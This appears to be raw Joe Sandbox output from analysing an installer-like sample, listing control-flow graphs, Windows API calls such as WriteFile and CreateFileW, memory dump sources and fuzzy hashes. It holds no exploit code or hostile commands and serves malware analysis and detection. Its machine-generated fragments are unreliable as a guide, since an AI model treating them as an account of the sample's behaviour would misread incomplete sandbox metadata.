                              control_flow_graph 7587 6cc6bc5e-6cc6bc7a 7588 6cc6bc80-6cc6bc82 7587->7588 7589 6cc6be39 7587->7589 7590 6cc6bca4-6cc6bcc5 7588->7590 7591 6cc6bc84-6cc6bc97 call 6cc5f9df call 6cc5f9cc call 6cc60120 7588->7591 7592 6cc6be3b-6cc6be3f 7589->7592 7593 6cc6bcc7-6cc6bcca 7590->7593 7594 6cc6bccc-6cc6bcd2 7590->7594 7607 6cc6bc9c-6cc6bc9f 7591->7607 7593->7594 7596 6cc6bcd4-6cc6bcd9 7593->7596 7594->7591 7594->7596 7599 6cc6bcea-6cc6bcfb call 6cc6be40 7596->7599 7600 6cc6bcdb-6cc6bce7 call 6cc6ac69 7596->7600 7608 6cc6bd3c-6cc6bd4e 7599->7608 7609 6cc6bcfd-6cc6bcff 7599->7609 7600->7599 7607->7592 7610 6cc6bd95-6cc6bdb7 WriteFile 7608->7610 7611 6cc6bd50-6cc6bd59 7608->7611 7612 6cc6bd26-6cc6bd32 call 6cc6beb1 7609->7612 7613 6cc6bd01-6cc6bd09 7609->7613 7616 6cc6bdc2 7610->7616 7617 6cc6bdb9-6cc6bdbf GetLastError 7610->7617 7619 6cc6bd85-6cc6bd93 call 6cc6c2c3 7611->7619 7620 6cc6bd5b-6cc6bd5e 7611->7620 7623 6cc6bd37-6cc6bd3a 7612->7623 7614 6cc6bd0f-6cc6bd1c call 6cc6c25b 7613->7614 7615 6cc6bdcb-6cc6bdce 7613->7615 7630 6cc6bd1f-6cc6bd21 7614->7630 7625 6cc6bdd1-6cc6bdd6 7615->7625 7624 6cc6bdc5-6cc6bdca 7616->7624 7617->7616 7619->7623 7626 6cc6bd75-6cc6bd83 call 6cc6c487 7620->7626 7627 6cc6bd60-6cc6bd63 7620->7627 7623->7630 7624->7615 7631 6cc6be34-6cc6be37 7625->7631 7632 6cc6bdd8-6cc6bddd 7625->7632 7626->7623 7627->7625 7633 6cc6bd65-6cc6bd73 call 6cc6c39e 7627->7633 7630->7624 7631->7592 7636 6cc6bddf-6cc6bde4 7632->7636 7637 6cc6be09-6cc6be15 7632->7637 7633->7623 7641 6cc6bde6-6cc6bdf8 call 6cc5f9cc call 6cc5f9df 7636->7641 7642 6cc6bdfd-6cc6be04 call 6cc5f9f2 7636->7642 7639 6cc6be17-6cc6be1a 7637->7639 7640 6cc6be1c-6cc6be2f call 6cc5f9cc call 6cc5f9df 7637->7640 7639->7589 7639->7640 7640->7607 7641->7607 7642->7607
                              APIs
                                • Part of subcall function 6CC6BEB1: GetConsoleCP.KERNEL32(?,6CC6B0D0,?), ref: 6CC6BEF9
                              • WriteFile.KERNEL32(?,?,6CC746EC,00000000,00000000,?,00000000,00000000,6CC75AB6,00000000,00000000,?,00000000,6CC6B0D0,6CC746EC,00000000), ref: 6CC6BDAF
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC746EC,6CC6B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC6BDB9
                              • __dosmaperr.LIBCMT ref: 6CC6BDFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                              • String ID: 8Q
                              • API String ID: 251514795-4022487301
                              • Opcode ID: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                              • Instruction ID: 7dd5b6805bea58a1330e6b1318cde70ca794635fa8c5c2f5ff69371e37da7e83
                              • Opcode Fuzzy Hash: cea60a34a9803cf2f829a9d8f87d2ea4d66bb026ec1810f6f5141b604882d85d
                              • Instruction Fuzzy Hash: A451B371A00609AFEB019FA6CAD0BEEBB79EF06318F540491F600ABE51F730994597A1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7654 6cc55b90-6cc55b9c 7655 6cc55bdd 7654->7655 7656 6cc55b9e-6cc55ba9 7654->7656 7657 6cc55bdf-6cc55c57 7655->7657 7658 6cc55bbf-6cc55bcc call 6cb201f0 call 6cc60b18 7656->7658 7659 6cc55bab-6cc55bbd 7656->7659 7660 6cc55c83-6cc55c89 7657->7660 7661 6cc55c59-6cc55c81 7657->7661 7668 6cc55bd1-6cc55bdb 7658->7668 7659->7658 7661->7660 7663 6cc55c8a-6cc55d49 call 6cb22250 call 6cb22340 call 6cc59379 call 6cb1e010 call 6cc57088 7661->7663 7668->7657
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55D31
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 323602529-1866435925
                              • Opcode ID: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                              • Instruction ID: 5eedbe1030bd1a6520c993e28e09f0f3d340d362c541e86e47cb939fc829aea2
                              • Opcode Fuzzy Hash: 09c5f68f4ed1d0d15d3af147c2049656b4e4adf7a0498e89df2ba9f41d094dd1
                              • Instruction Fuzzy Hash: 1F5133B5901B408FD725CF29C485BA7BBF1FB48318F408A6DD8864BB90E775B919CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7699 6cc6b925-6cc6b939 call 6cc715a2 7702 6cc6b93f-6cc6b947 7699->7702 7703 6cc6b93b-6cc6b93d 7699->7703 7705 6cc6b952-6cc6b955 7702->7705 7706 6cc6b949-6cc6b950 7702->7706 7704 6cc6b98d-6cc6b9ad call 6cc7171f 7703->7704 7716 6cc6b9af-6cc6b9b9 call 6cc5f9f2 7704->7716 7717 6cc6b9bb 7704->7717 7707 6cc6b957-6cc6b95b 7705->7707 7708 6cc6b973-6cc6b983 call 6cc715a2 CloseHandle 7705->7708 7706->7705 7710 6cc6b95d-6cc6b971 call 6cc715a2 * 2 7706->7710 7707->7708 7707->7710 7708->7703 7720 6cc6b985-6cc6b98b GetLastError 7708->7720 7710->7703 7710->7708 7718 6cc6b9bd-6cc6b9c0 7716->7718 7717->7718 7720->7704
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC7425F), ref: 6CC6B97B
                              • GetLastError.KERNEL32(?,00000000,?,6CC7425F), ref: 6CC6B985
                              • __dosmaperr.LIBCMT ref: 6CC6B9B0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CloseErrorHandleLast__dosmaperr
                              • String ID:
                              • API String ID: 2583163307-0
                              • Opcode ID: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                              • Instruction ID: 37634b799899b17af7265afe1f55f15634a9e69a34b6d9501c899387fe916815
                              • Opcode Fuzzy Hash: c792d1f1dce9563c24c653f9d44f2a4f76b8de95000c01556d7b7fbf7fe8b073
                              • Instruction Fuzzy Hash: 4E010833A455201AD215063F96B57AE7BB99F83B3CF290259F91B97EC0FB60C8459260

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7944 6cc60b9c-6cc60ba7 7945 6cc60bbe-6cc60bcb 7944->7945 7946 6cc60ba9-6cc60bbc call 6cc5f9cc call 6cc60120 7944->7946 7948 6cc60c06-6cc60c0f call 6cc6ae75 7945->7948 7949 6cc60bcd-6cc60be2 call 6cc60cb9 call 6cc6873e call 6cc69c60 call 6cc6b898 7945->7949 7957 6cc60c10-6cc60c12 7946->7957 7948->7957 7963 6cc60be7-6cc60bec 7949->7963 7964 6cc60bf3-6cc60bf7 7963->7964 7965 6cc60bee-6cc60bf1 7963->7965 7964->7948 7966 6cc60bf9-6cc60c05 call 6cc647bb 7964->7966 7965->7948 7966->7948
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction ID: 255065eed86daa86ad1437724702a7dda79d75404a9f95ae480282aa1aaf5bb9
                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                              • Instruction Fuzzy Hash: AFF0F932901A547AC6211A3B8F80BCB33989F8237CF100715E961A3ED0FB71D449C7AA
                              APIs
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AB4
                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC55AF4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Ios_base_dtorstd::ios_base::_
                              • String ID:
                              • API String ID: 323602529-0
                              • Opcode ID: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                              • Instruction ID: 3744d6ea5a68e533d5dfffc8e520dd527278eca1211e4e23af249a22854736c2
                              • Opcode Fuzzy Hash: 056bd210ffa63ac12098cf766cb0cf2f107cfd80170dc691e886730c76da8999
                              • Instruction Fuzzy Hash: 56515871601B40DBD725CF25C485BE6BBF4FB04718F848A1CE4AA4BBA1EB34B559CB84
                              APIs
                              • GetLastError.KERNEL32(6CC86DD8,0000000C), ref: 6CC5EF52
                              • ExitThread.KERNEL32 ref: 6CC5EF59
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: b5b4a8d90974bbc4207b0b175733afffa7e33e0338cfd14be0fbdcfb99a2d4fc
                              • Instruction ID: 5f98a3d28d530680d5a94486f63429f6a60c1b3e5f72f1967f26f7bf7017be05
                              • Opcode Fuzzy Hash: b5b4a8d90974bbc4207b0b175733afffa7e33e0338cfd14be0fbdcfb99a2d4fc
                              • Instruction Fuzzy Hash: 48F0C271A10600AFDB00DBB1C449AAE3B78FF42219F544289E00697B41FF355925CB91
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __wsopen_s
                              • String ID:
                              • API String ID: 3347428461-0
                              • Opcode ID: 58c269a236040e275d47c4b0a5fe2560cd1562607ae4c5f674325a2ad342db78
                              • Instruction ID: 580fc5439ac059497f0d213fa1f712bbc1565ea682752875b60e4c2b3c25cb22
                              • Opcode Fuzzy Hash: 58c269a236040e275d47c4b0a5fe2560cd1562607ae4c5f674325a2ad342db78
                              • Instruction Fuzzy Hash: 6A118C71A0420EAFCF05CF59E945A9B3BF8EF48308F044059F808EB301E631E921DBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction ID: a05d8d777258b9cd599591cd82b689a9bd916489b0ab1b3382e1d88b45c7ba8e
                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                              • Instruction Fuzzy Hash: 1A012872C01159AFCF12DFA88D44AEEBFB5EB08214F144165ED24A26A0E7318A25DB91
                              APIs
                              • CreateFileW.KERNEL32(00000000,00000000,?,6CC74115,?,?,00000000,?,6CC74115,00000000,0000000C), ref: 6CC74474
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: f6412b3c77fd3ec8736f0c5345de4b266a80f122e0b7ffc203085e135d578c44
                              • Instruction ID: 053f7ba73918229063323063be7acfda25a0542d6491904c749339b8bdc14b1f
                              • Opcode Fuzzy Hash: f6412b3c77fd3ec8736f0c5345de4b266a80f122e0b7ffc203085e135d578c44
                              • Instruction Fuzzy Hash: 69D06C3210010DBBDF028E84DC06EDA3FBAFB88714F014000BA1856020C732E861AB90
                              Memory Dump Source
                              • Source File: 00000006.00000002.2300066659.000000006CAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAD0000, based on PE: true
                              • Associated: 00000006.00000002.2300037819.000000006CAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301182455.000000006CC78000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2302564266.000000006CE43000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction ID: a855a0250adc46fe3c422d9be574db4e7ce3b148c067bdc0db52ad34f47b2ded
                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                              • Instruction Fuzzy Hash:
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCE84B1
                                • Part of subcall function 6CCE993B: __EH_prolog.LIBCMT ref: 6CCE9940
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 1$`)K$h)K
                              • API String ID: 3519838083-3935664338
                              • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction ID: 6e2873fe4e938a2b9686d8ad84377bca1cfdce6d7bfe0af8d1e24c5793740712
                              • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                              • Instruction Fuzzy Hash: 98F27C70D01248DFDF11CFA8C884BDDBBB5AF4A308F244499E449AB791EB759A85CF11
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCDAEF4
                                • Part of subcall function 6CCDE622: __EH_prolog.LIBCMT ref: 6CCDE627
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $h%K
                              • API String ID: 3519838083-1737110039
                              • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction ID: 0da6a2f45b01c949759f9f81bc01bd2127eb563010bc0e0be0ba8f460b0b8eae
                              • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                              • Instruction Fuzzy Hash: 13537830D01258DFDB15CFA4C994BEDBBB4AF09308F1540D9D54AA7A91EB30AE89CF61
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $J
                              • API String ID: 3519838083-1755042146
                              • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction ID: 4832ee7d8ade5f05d335c4b9311e7f6283dbd3b2436cc2b830a2c0bc149655c8
                              • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                              • Instruction Fuzzy Hash: 4CE2CE70A05289DFEF01CFA8C584BDDBFB4BF4A308F244099E855AB681EB74D945CB61
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCB6CE5
                                • Part of subcall function 6CC8CC2A: __EH_prolog.LIBCMT ref: 6CC8CC2F
                                • Part of subcall function 6CC8E6A6: __EH_prolog.LIBCMT ref: 6CC8E6AB
                                • Part of subcall function 6CCB6A0E: __EH_prolog.LIBCMT ref: 6CCB6A13
                                • Part of subcall function 6CCB6837: __EH_prolog.LIBCMT ref: 6CCB683C
                                • Part of subcall function 6CCBA143: __EH_prolog.LIBCMT ref: 6CCBA148
                                • Part of subcall function 6CCBA143: ctype.LIBCPMT ref: 6CCBA16C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog$ctype
                              • String ID:
                              • API String ID: 1039218491-3916222277
                              • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction ID: 671e7af4a42c59b890e14e954f9543d470d6f978196ad4b55753b17358c1c703
                              • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                              • Instruction Fuzzy Hash: A603BD30805289DEDF15CFE4C984BDDBBB0AF15318F24409AD849B7A91EB349B89DF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3J$`/J$`1J$p0J
                              • API String ID: 0-2826663437
                              • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction ID: bbeda915d2eba73a4788b6aea0468685e48b5ffd653aedbffd95e67010262a6f
                              • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                              • Instruction Fuzzy Hash: CC41E772F10A601AF3488F6A8C855667FC3C7C9346B4AC23DD665C66DDEABDC40782A4
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: W
                              • API String ID: 3519838083-655174618
                              • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction ID: f9b9acb43a77431563ac4ad96ab9d49baf1734ef827cacd6f83d0fee99dbadc0
                              • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                              • Instruction Fuzzy Hash: 99B26B70A05259DFDB01CFA8C484B9EBBB4BF4A318F244099E845EB752EB75DD41CBA0
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CCD489B
                                • Part of subcall function 6CCD5FC9: __EH_prolog.LIBCMT ref: 6CCD5FCE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2301249737.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC88000, based on PE: true
                              • Associated: 00000006.00000002.2301818126.000000006CD53000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.2301848634.000000006CD59000.00000020.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6cad0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: @ K
                              • API String ID: 3519838083-4216449128
                              • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                              • Instruction ID: a951610ac0dda3f0ce79e61c76bcec2dea3fb8f94b78e7214b623b83dc00bab6
